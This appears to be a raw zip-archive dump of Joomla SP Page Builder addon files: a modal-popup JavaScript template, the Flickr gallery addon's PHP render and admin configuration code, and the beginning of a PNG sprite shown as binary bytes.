			buttonClass += ( data.button_block )? " " + data.button_block : ""

		let modalSize = (data.modal_popup_width)? "max-width:" + data.modal_popup_width + "px;":"";
			modalSize += (data.modal_popup_height)? "height:" + data.modal_popup_height + "px;":""

		let selectorStyle = (data.selector_margin_top)? "margin-top:" + data.selector_margin_top + "px;":"";
			selectorStyle += (data.selector_margin_bottom)? "margin-bottom:" + data.selector_margin_bottom + "px;":""

		var modern_font_style = false;
		var button_fontstyle = data.button_fontstyle || "";
		var button_font_style = data.button_font_style || "";

		var button_padding = "";
		var button_padding_sm = "";
		var button_padding_xs = "";
		if(data.button_padding){
			if(_.isObject(data.button_padding)){
				if(data.button_padding.md.trim() !== ""){
					button_padding = data.button_padding.md.split(" ").map(item => {
						if(_.isEmpty(item)){
							return "0";
						}
						return item;
					}).join(" ")
				}

				if(data.button_padding.sm.trim() !== ""){
					button_padding_sm = data.button_padding.sm.split(" ").map(item => {
						if(_.isEmpty(item)){
							return "0";
						}
						return item;
					}).join(" ")
				}

				if(data.button_padding.xs.trim() !== ""){
					button_padding_xs = data.button_padding.xs.split(" ").map(item => {
						if(_.isEmpty(item)){
							return "0";
						}
						return item;
					}).join(" ")
				}
			} else {
				if(data.button_padding.trim() !== ""){
					button_padding = data.button_padding.split(" ").map(item => {
						if(_.isEmpty(item)){
							return "0";
						}
						return item;
					}).join(" ")
				}
			}

		}
	    #>

		<style type="text/css">
		<# if( (data.modal_selector == "icon" || data.modal_selector == "image") && (data.selector_icon_name || data.selector_image)) { #>
			#sppb-addon-{{ data.id }} .sppb-modal-selector span.text {
				<# if(_.isObject(data.selector_text_size)){ #>
					font-size: {{ data.selector_text_size.md }}px;
				<# } else { #>
					font-size: {{ data.selector_text_size }}px;
				<# } #>
				font-weight: {{ data.selector_text_weight }};
				margin: {{ data.selector_text_margin }};
				color: {{ data.selector_text_color }};
			}

			<# if(_.isObject(data.selector_text_size)){ #>
				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} .sppb-modal-selector span.text {
						font-size: {{ data.selector_text_size.sm }}px;
					}
				}
				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} .sppb-modal-selector span.text {
						font-size: {{ data.selector_text_size.xs }}px;
					}
				}
			<# } #>
		<# } #>
	    <# if( data.modal_selector == "icon") { #>
			<#
				if( data.selector_icon_name ) {
					selectorStyle += "display:inline-block;line-height:1;"
					selectorStyle += ( data.selector_icon_color )? "color:" + data.selector_icon_color + ";":""
					selectorStyle += ( data.selector_icon_background )? "background-color:" + data.selector_icon_background + ";":""
					selectorStyle += ( data.selector_icon_border_color )? "border-style:solid;border-color:" + data.selector_icon_border_color + ";":""
	        #>
				#sppb-addon-{{ data.id }} .sppb-modal-selector span {
					{{selectorStyle}}
					<# if(_.isObject(data.selector_icon_border_width)){ #>
						border-width: {{ data.selector_icon_border_width.md }}px;
					<# } else { #>
						border-width: {{ data.selector_icon_border_width }}px;
					<# } #>

					<# if(_.isObject(data.selector_icon_border_radius)){ #>
						border-radius: {{ data.selector_icon_border_radius.md }}px;
					<# } else { #>
						border-radius: {{ data.selector_icon_border_radius }}px;
					<# } #>

					<# if(_.isObject(data.selector_icon_padding)){ #>
						padding: {{ data.selector_icon_padding.md }}px;
					<# } else { #>
						padding: {{ data.selector_icon_padding }}px;
					<# } #>
				}
	    	<# } #>

			<# if(_.isObject(data.selector_icon_size)){ #>
				#sppb-addon-{{ data.id }} .sppb-modal-selector span > i {
					font-size: {{ data.selector_icon_size.md }}px;
					width: {{ data.selector_icon_size.md }}px;
					height: {{ data.selector_icon_size.md }}px;
					line-height: {{ data.selector_icon_size.md }}px;
				}
			<# } else { #>
				#sppb-addon-{{ data.id }} .sppb-modal-selector span > i {
					font-size: {{ data.selector_icon_size }}px;
					width: {{ data.selector_icon_size }}px;
					height: {{ data.selector_icon_size }}px;
					line-height: {{ data.selector_icon_size }}px;
				}
	        <# } #>
		<# } else { #>
			#sppb-addon-{{ data.id }} .sppb-modal-selector {
				{{selectorStyle}}
			}
		<# } #>


	    <# if ( modalContentType == "image"){ #>
	        #sppb-addon-{{ data.id }}.popup-image-block img{
	        	{{modalSize}}
	        }
	    <# } else if( modalContentType != "video"){ #>
	        #sppb-addon-{{ data.id }}.white-popup-block {
	        	{{modalSize}}
	        }
		<# } #>

		#sppb-addon-{{ data.id }} #sppb-modal-{{ data.id }}-selector.sppb-btn-{{ data.button_type }} {
			letter-spacing: {{ data.button_letterspace }};
			<# if(_.isObject(button_font_style) && button_font_style.underline) { #>
				text-decoration: underline;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.italic) { #>
				font-style: italic;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.uppercase) { #>
				text-transform: uppercase;
				<# modern_font_style = true #>
			<# } #>

			<# if(_.isObject(button_font_style) && button_font_style.weight) { #>
				font-weight: {{ button_font_style.weight }};
				<# modern_font_style = true #>
			<# } #>

			<# if(!modern_font_style) { #>
				<# if(_.isArray(button_fontstyle)) { #>
					<# if(button_fontstyle.indexOf("underline") !== -1){ #>
						text-decoration: underline;
					<# } #>
					<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
						text-transform: uppercase;
					<# } #>
					<# if(button_fontstyle.indexOf("italic") !== -1){ #>
						font-style: italic;
					<# } #>
					<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
						font-weight: lighter;
					<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
						font-weight: normal;
					<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
						font-weight: bold;
					<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
						font-weight: bolder;
					<# } #>
				<# } #>
			<# } #>
		}

		<# if(data.button_type == "custom"){ #>
			#sppb-addon-{{ data.id }} #sppb-modal-{{ data.id }}-selector.sppb-btn-custom{
				color: {{ data.button_color }};
				padding: {{ button_padding }};
				<# if(data.button_appearance == "outline"){ #>
					border-color: {{ data.button_background_color }}
				<# } else if(data.button_appearance == "3d"){ #>
					border-bottom-color: {{ data.button_background_color_hover }};
					background-color: {{ data.button_background_color }};
				<# } else if(data.button_appearance == "gradient"){ #>
					border: none;
					<# if(typeof data.button_background_gradient.type !== "undefined" && data.button_background_gradient.type == "radial"){ #>
						background-image: radial-gradient(at {{ data.button_background_gradient.radialPos || "center center"}}, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
					<# } else { #>
						background-image: linear-gradient({{ data.button_background_gradient.deg || 0}}deg, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
					<# } #>
				<# } else { #>
					background-color: {{ data.button_background_color }};
				<# } #>
			}

			#sppb-addon-{{ data.id }} #sppb-modal-{{ data.id }}-selector.sppb-btn-custom:hover{
				color: {{ data.button_color_hover }};
				background-color: {{ data.button_background_color_hover }};
				<# if(data.button_appearance == "outline"){ #>
					border-color: {{ data.button_background_color_hover }};
				<# } else if(data.button_appearance == "gradient"){ #>
					<# if(typeof data.button_background_gradient_hover.type !== "undefined" && data.button_background_gradient_hover.type == "radial"){ #>
						background-image: radial-gradient(at {{ data.button_background_gradient_hover.radialPos || "center center"}}, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
					<# } else { #>
						background-image: linear-gradient({{ data.button_background_gradient_hover.deg || 0}}deg, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
					<# } #>
				<# } #>
			}
			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} #sppb-modal-{{ data.id }}-selector.sppb-btn-custom{
					padding: {{ button_padding_sm }};
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} #sppb-modal-{{ data.id }}-selector.sppb-btn-custom{
					padding: {{ button_padding_xs }};
				}
			}
		<# } #>
		@media (min-width: 768px) and (max-width: 991px) {
			<# if( data.modal_selector == "icon") { #>
				<# if( data.selector_icon_name ) { #>
					#sppb-addon-{{ data.id }} .sppb-modal-selector span {
						<# if(_.isObject(data.selector_icon_border_width)){ #>
							border-width: {{ data.selector_icon_border_width.sm }}px;
						<# } #>

						<# if(_.isObject(data.selector_icon_border_radius)){ #>
							border-radius: {{ data.selector_icon_border_radius.sm }}px;
						<# } #>

						<# if(_.isObject(data.selector_icon_padding)){ #>
							padding: {{ data.selector_icon_padding.sm }}px;
						<# } #>
					}
				<# } #>

				<# if(_.isObject(data.selector_icon_size)){ #>
					#sppb-addon-{{ data.id }} .sppb-modal-selector span > i {
						font-size: {{ data.selector_icon_size.sm }}px;
						width: {{ data.selector_icon_size.sm }}px;
						height: {{ data.selector_icon_size.sm }}px;
						line-height: {{ data.selector_icon_size.sm }}px;
					}
				<# } #>
			<# } #>
		}
		@media (max-width: 767px) {
			<# if( data.modal_selector == "icon") { #>
				<# if( data.selector_icon_name ) { #>
					#sppb-addon-{{ data.id }} .sppb-modal-selector span {
						<# if(_.isObject(data.selector_icon_border_width)){ #>
							border-width: {{ data.selector_icon_border_width.xs }}px;
						<# } #>

						<# if(_.isObject(data.selector_icon_border_radius)){ #>
							border-radius: {{ data.selector_icon_border_radius.xs }}px;
						<# } #>

						<# if(_.isObject(data.selector_icon_padding)){ #>
							padding: {{ data.selector_icon_padding.xs }}px;
						<# } #>
					}
				<# } #>

				<# if(_.isObject(data.selector_icon_size)){ #>
					#sppb-addon-{{ data.id }} .sppb-modal-selector span > i {
						font-size: {{ data.selector_icon_size.xs }}px;
						width: {{ data.selector_icon_size.xs }}px;
						height: {{ data.selector_icon_size.xs }}px;
						line-height: {{ data.selector_icon_size.xs }}px;
					}
				<# } #>
			<# } #>
		}
	    </style>

		<# if( modalContentType == "text") { #>
			<div id="{{ modalUniqueId }}" class="mfp-hide white-popup-block">
				<div class="modal-inner-block">
					{{{ data.modal_content_text }}}
				</div>
			</div>
	    <#
		} else if( modalContentType == "video") {
			modalUrl = data.modal_content_video_url
			attribs = \'data-popup_type="iframe" data-mainclass="mfp-no-margins mfp-with-zoom"\'
		} else {
	    #>
			<div id="{{ modalUniqueId }}" class="mfp-hide popup-image-block">
				<div class="modal-inner-block">
					<#
					var modal_content_image = {}
					if (typeof data.modal_content_image !== "undefined" && typeof data.modal_content_image.src !== "undefined") {
						modal_content_image = data.modal_content_image
					} else {
						modal_content_image = {src: data.modal_content_image}
					}
					if(modal_content_image.src && modal_content_image.src.indexOf("https://") == -1 && modal_content_image.src.indexOf("http://") == -1){
					#>
						<img class="mfp-img" src=\'{{ pagebuilder_base + modal_content_image.src }}\' >
					<# } else { #>
						<img class="mfp-img" src=\'{{ modal_content_image.src }}\' >
					<# } #>
				</div>
			</div>
	    <# } #>

	    <div class="{{ data.class }} {{ data.alignment }}">
			<#
			var selector_image = {}
			if (typeof data.selector_image !== "undefined" && typeof data.selector_image.src !== "undefined") {
				selector_image = data.selector_image
			} else {
				selector_image = {src: data.selector_image}
			}
			if(data.modal_selector == "image") {
			#>
				<a class="sppb-modal-selector sppb-magnific-popup" {{{ attribs }}} href=\'{{ modalUrl }}\' id="{{ modalUniqueId }}-selector">
					<# if(selector_image.src && selector_image.src.indexOf("https://") == -1 && selector_image.src.indexOf("http://") == -1){ #>
						<img src=\'{{ pagebuilder_base + selector_image.src }}\' alt="">
					<# } else { #>
						<img src=\'{{ selector_image.src }}\' alt="">
					<# } #>
					<# if(data.selector_text){ #>
						<span class="text">{{ data.selector_text }}</span>
					<# } #>
				</a>
			<# } else if (data.modal_selector == "icon"){
				let select_icon_arr = (typeof data.selector_icon_name !== "undefined" && data.selector_icon_name) ? data.selector_icon_name.split(" ") : "";
				let select_icon_name = select_icon_arr.length === 1 ? "fa "+data.selector_icon_name : data.selector_icon_name;
			#>
				<a class="sppb-modal-selector sppb-magnific-popup" href=\'{{ modalUrl }}\' {{{ attribs }}} id="{{ modalUniqueId }}-selector">
					<span class="sppb-modal-icon-wrap">
					
					<# if(data.peicon_name){ #>
					    <i class="pe {{ data.peicon_name }}"></i>
					<# } else { #>
						<i class="{{ select_icon_name }}"></i>
					<# } #>
						<# if(data.show_ripple_effect) { #>
							<span class="sppb-ripple-effect"></span>
						<# } #>
					</span>
					<# if(data.selector_text){ #>
						<span class="text">{{ data.selector_text }}</span>
					<# } #>
				</a>
			<# } else {
				
				let btn_peicon_arr = (typeof data.button_peicon !== "undefined" && data.button_peicon) ? data.button_peicon.split(" ") : "";
				let btn_peicon_name = btn_peicon_arr.length === 1 ? "pe "+data.button_peicon : data.button_peicon;
				
				let btn_icon_arr = (typeof data.button_icon !== "undefined" && data.button_icon) ? data.button_icon.split(" ") : "";
				let btn_icon_name = btn_icon_arr.length === 1 ? "fa "+data.button_icon : data.button_icon;
			#>
				<a class="sppb-btn {{ buttonClass }} sppb-magnific-popup sppb-modal-selector" {{{ attribs }}} href=\'{{ modalUrl }}\' id="{{ modalUniqueId }}-selector">
				<# if( buttonIconPosition == "left" ) { #> 
				
					<# if(btn_peicon_name){ #>
					<i class="{{ btn_peicon_name }}"></i>
					<# } else { #>
					<i class="{{ btn_icon_name }}"></i>
					<# } #>
				
				<# } #> {{ data.button_text }} <# if( buttonIconPosition == "right" ) { #> 
				
					<# if(data.button_peicon){ #>
					<i style="margin-left:7px;margin-right:-1px;" class="{{ btn_peicon_name }}"></i>
					<# } else { #>
					<i style="margin-left:5px;margin-right:-1px;" class="{{ btn_icon_name }}"></i>
					<# } #>
				
				<# } #></a>
			<# } #>
	    </div>';

		return $output;
	}
}PK!a�6�77)flex/sppagebuilder/addons/flickr/site.phpnu&1i�<?php
/**
 * @package SP Page Builder
 * @author JoomShaper http://www.joomshaper.com
 * @copyright Copyright (c) 2010 - 2016 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');

class SppagebuilderAddonFlickr extends SppagebuilderAddons {

	public function render() {

		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' ' . $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';
		$count = (isset($this->addon->settings->count) && $this->addon->settings->count) ? $this->addon->settings->count : 0;
		$height = (isset($this->addon->settings->height) && $this->addon->settings->height) ? $this->addon->settings->height : '';
		$images = $this->getImages();

		if(count($images) < $count) {
			$count = count($images);
		}

		//Output
		$output  = '<div class="sppb-addon sppb-addon-flickr ' . $class . '">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '<div class="sppb-addon-content">';
		$output .= '<ul class="sppb-flickr-gallery">';

		for ($i=0; $i < $count; $i++) {
			$output .= '<li>';
			$output .= '<a target="_blank" href="'. str_replace('_m', '_b', $images[$i]->media->m) .'" class="sppb-flickr-gallery-btn">';
			
				// Image
				/* Lazyload for images */
				if($has_lazyload) {
					$output .= '<img class="lazyload sppb-img-responsive" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. str_replace('_m', '_q', $images[$i]->media->m) .'" alt="'. $images[$i]->title .'" data-expand="-20">';
				} else {
					$output .= '<img class="sppb-img-responsive" src="'. str_replace('_m', '_q', $images[$i]->media->m) .'" alt="'. $images[$i]->title .'">';	
				}
				
				//$output .= '<img class="sppb-img-responsive" src="'. str_replace('_m', '_q', $images[$i]->media->m) .'" alt="'. $images[$i]->title .'">';
			$output .= '</a>';
			$output .= '</li>';
		}

		$output .= '</ul>';
		$output .= '</div>';
		$output .= '</div>';

		return $output;
	}

	public function css() {
		$addon_id    = '#sppb-addon-' . $this->addon->id;
		$thumb_per_row  = (isset($this->addon->settings->thumb_per_row) && $this->addon->settings->thumb_per_row) ? $this->addon->settings->thumb_per_row : 4;
		$height = (isset($this->addon->settings->height) && $this->addon->settings->height) ? $this->addon->settings->height : '';

		$width = round((100/$thumb_per_row), 2);

		$css = '';
		if($thumb_per_row) {
			$css .= $addon_id . ' .sppb-flickr-gallery li {';
			$css .= 'width:'.$width.'%;';
			$css .= 'height:auto;';
			$css .= '}';
		}
		if($height) {
			$css .= $addon_id . ' .sppb-flickr-gallery li a img {';
			$css .= 'height:' . $height . 'px;';
			$css .= '}';
		}

		return $css;
	}

	public function stylesheets() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/css/magnific-popup.css');
	}

	public function scripts() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/js/jquery.magnific-popup.min.js');
	}

	public function js() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$js ='jQuery(function($){
			$("'.$addon_id.' ul li").magnificPopup({
				delegate: "a",
				type: "image",
				mainClass: "mfp-with-zoom",
				gallery:{
					enabled:true
				},
				image: {
					verticalFit: true
				},
				zoom: {
					enabled: true,
					duration: 300
				}
			});
		})';
		$js = preg_replace('/[\n\t]+/m', '', $js); // Remove whitespace
		return $js;
	}

	private function getImages() {

		jimport( 'joomla.filesystem.folder' );

		$cache_path = JPATH_CACHE . '/com_sppagebuilder/addons/addon-' . $this->addon->id;
		$cache_file = $cache_path . '/flickr.json';

		if(!file_exists($cache_path)) {
			JFolder::create($cache_path, 0755);
		}

		if (file_exists($cache_file) && (filemtime($cache_file) > (time() - 60 * 30 ))) {
			$images = file_get_contents($cache_file);
		} else {
			$id = (isset($this->addon->settings->id) && $this->addon->settings->id) ? $this->addon->settings->id : '35591378@N03';
			$api = 'http://api.flickr.com/services/feeds/photos_public.gne?id='. $id .'&format=json&nojsoncallback=1';

			if( ini_get('allow_url_fopen') ) {
				$images = file_get_contents($api);
				file_put_contents($cache_file, $images, LOCK_EX);
			} else {
				$images = $this->curl($api);
			}

		}
		$json = json_decode($images);
		if(isset($json->items)) {
			return $json->items;
		}

		return array();
	}

	function curl($url) {
	    $ch = curl_init();
	    curl_setopt($ch, CURLOPT_URL, $url);
	    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
	    $data = curl_exec($ch);
	    curl_close($ch);
	    return $data;
	}

}
PK!�
5��*flex/sppagebuilder/addons/flickr/admin.phpnu&1i�<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2016 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_flickr',
		'category'=>'Social',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR_DESC'),
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_lineheight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_bottom'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				'separator_addon_options'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ADDON_OPTIONS')
				),

				'id'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR_ID'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR_ID_DESC'),
					'std'=>'',
				),

				'count'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR_COUNT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_FLICKR_COUNT_DESC'),
					'std'=>'6',
				),

				'thumb_per_row'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_THUMB_PER_ROW'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_THUMB_PER_ROW_DESC'),
					'std'=>  '4'
				),
				
				'height'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_HEIGHT_DESC'),
					'placeholder'=>'100 (Custom height)',
					'std'=>''
					),
					
				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!��N�?flex/sppagebuilder/assets/images/prettyPhoto/default/sprite.pngnu&1i��PNG


IHDR��B���tEXtSoftwareAdobe ImageReadyq�e<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118BF2F6B511368090" xmpMM:DocumentID="xmp.did:275503303E8511E08E6F9312EF314E02" xmpMM:InstanceID="xmp.iid:24283CC43E8311E08E6F9312EF314E02" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:03801174072068118BF2F6B511368090" stRef:documentID="xmp.did:01801174072068118BF2F6B511368090"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�GIJIDATx��]pE���Wc	��0 Ȋ`I�2�z7�E��
��K|k|�R���|\ETJ���
p�,�^$��Hx$��DH$��ϝ̙�3'��93鯪�$3�s�������Ӟ��"f�����QQQc��çz<�:t5}^���TJ�J�{���x��!(((0%��+�
7�`K��=��ߣ�gϞ��ԩӒ�������;]v�e,22R*�A�󬱱����BYP�^.//k������-��o߾��V�}��5;0b�Ϟ={�R笻��+����
F�Ej��18�?щ��լ����ܹsw&''��i��_�*�nJζ��K�.>2Q9RdЕ�oP�0�(�,��/u�c�h5������z��H�n��ݻSB���L���)��z�ڀ�.�xϮ]���ٳ�+111R'*(�����aj{���m"_��ѣG�D�����8��*�ӡp�f�\֛��J%hk��e��s�λ��߻w��<A��b���:��/��A��u�m����V
A2�0��q?�8qbXZZZ�޵�5Q'R��6�&��(��
��]WW�Μ9�v����f��4o߾�2�(f�d�馛4�߹sg@�s��X�m^װr����7H�Vwot����Ğ䓗����	�NM���L�諯��!��С�t�,��7��������z��ȰT&R���!+�<��Г�6j�(Ͻ��;�L�� h[7�a0��6o�<H�ӧO���:�L����9\�kQu��2i�s�֭-�umV�^^E@�Fd������,��Ȍϖ�K���]���ݻw�O3���Z�A]�����^`Ǐo�LIIIa6�c��6|�ڵ�i^}Eź�cN�t�RF����_~�����+��ɓ�u�Gb�>VK@)t>�\ >ע����fdB���ٓO>��|�MI���'�U��bhz4��S���o�����_�3�<#=t٤��^{��:u�eee�֕��!k֬�1j'c4�ob�j������^z��8�.�z 320��֧�~�eggKA�?��d(�Y��4�ǖ!�F�/F��㏳��{�ѵ��g����O>��P���~�8����J��!�q�#s�Y��l����СC�h���r�5*��W&�l ..�]�x�m۶���g_�����!��<H0�KL�>�]{�f���<��x�F8�~�ػ�+��l�2ƣ�|���4���-�<{hR�'}�+�~���죏>�F�M�{��B
y6�Gm�Ȥu/$��
6��?��M�6M7��!��<�WX�%K�����K
�Ty��#\z�h�����
�'8iii~��?D��4�C�#Q��@�
��h�j٤z��S32�}/�b�dҕG��{���in#yl�,R�O_�p��EL��Z���˒��(ڰ.�____�q���G��r`�`;vL�G�ѵTwB}ܬLZ@ x���#GJ�ǃ5+��<j���O�||��(�'�����ڃ�Ν3�4���{N2op3g�d�}���p^�u6g�Ce�����~P�i�SG��̙3�\���A�/}衇�
��h�{��̌Ljt�ؑ%''�[o�U���o�^�!��<Z
���*���Bx����vTVV6E�y6��>�y��K��ٳgѩ�͟?��J�Ɵ�9Woچ���
�u
